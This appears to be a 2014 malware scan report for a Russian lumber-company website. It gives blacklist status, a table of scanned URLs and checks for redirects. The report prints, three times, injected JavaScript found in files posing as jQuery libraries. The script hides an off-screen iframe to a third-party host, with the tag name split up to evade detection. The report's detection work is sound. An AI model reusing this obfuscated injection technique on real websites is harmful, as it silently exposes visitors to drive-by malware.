Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=massiv-nord.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://massiv-nord.ru/
Result: The website is marked by Yandex as suspicious - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://massiv-nord.ru/ | 200 OK Content-Length: 24947 Content-Type: text/html | clean |
http://massiv-nord.ru/assets/templates/site/scripts/jquery-1.4.1.min.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | malicious |
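Malicious code - confirmed by antiviruses (see below). The excerpt is truncated: browserData() and setTimer() are not defined in it, and the closing "})();" has no visible opening. What it does show is a check for a marker cookie and, when that cookie is absent, a document.write of an iframe positioned off-screen (left/top -1370px) that loads a page from a third-party host. The tag name is assembled from string fragments, so a plain-text search for "iframe" will not match it. The same code is reported for all three script URLs in this table, each with Content-Length 2585. function getCookie(name) {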
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://massiv-nord.ru/assets/templates/site/scripts/jquery.jcarousel.pack.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://massiv-nord.ru/assets/templates/site/scripts/jquery.jcarousel.setup.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://massiv-nord.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://massiv-nord.ru/about.html | 200 OK Content-Length: 24817 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2665533 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://massiv-nord.ru/uslugi.html | 200 OK Content-Length: 26343 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/prodaja-pilomaterialov.html | 200 OK Content-Length: 40053 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/ | HTTP/1.1 301 Moved Permanently Cache-Control: private, must-revalidate Connection: close Date: Wed, 27 Aug 2014 01:21:30 GMT Location: /uslugi.html Server: nginx/1.6.0 Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Set-Cookie: SN4bbd93e54b432=d7f4601a6cc5941ca958eff4c82e94fb; path=/ Set-Cookie: SN4bbd93e54b432=d7f4601a6cc5941ca958eff4c82e94fb; path=/ X-Powered-By: PHP/5.3.18 | clean |
http://massiv-nord.ru/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://massiv-nord.ru/kontaktnaya-informacziya.html | 200 OK Content-Length: 18901 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/suchka-pilomaterialov.html | 200 OK Content-Length: 25631 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/izgotovlenie-mebelnix-shitov.html | 200 OK Content-Length: 62225 Content-Type: text/html | clean |
http://massiv-nord.ru/prajs-na-uslugi.html | 200 OK Content-Length: 78373 Content-Type: text/html | clean |
http://massiv-nord.ru/prajs-na-uslugi/prajs-na-pilomaterialyi.html | 200 OK Content-Length: 33861 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: massiv-nord.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Wed, 27 Aug 2014 01:21:25 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
X-Powered-By: PHP/5.3.18
GET / HTTP/1.1
Host: massiv-nord.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Wed, 27 Aug 2014 01:21:25 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
X-Powered-By: PHP/5.3.18
Second query (visit from search engine):
GET / HTTP/1.1
Host: massiv-nord.ru
Referer: http://www.google.com/search?q=massiv-nord.ru
Result:
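The result is similar to the first query. There are no suspicious redirects found. Note that this check only compares the HTTP response with and without a search-engine Referer; the iframe injection reported under "Scanned pages/files" happens in client-side JavaScript, so it would not appear here as a redirect.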
GET / HTTP/1.1
Host: massiv-nord.ru
Referer: http://www.google.com/search?q=massiv-nord.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.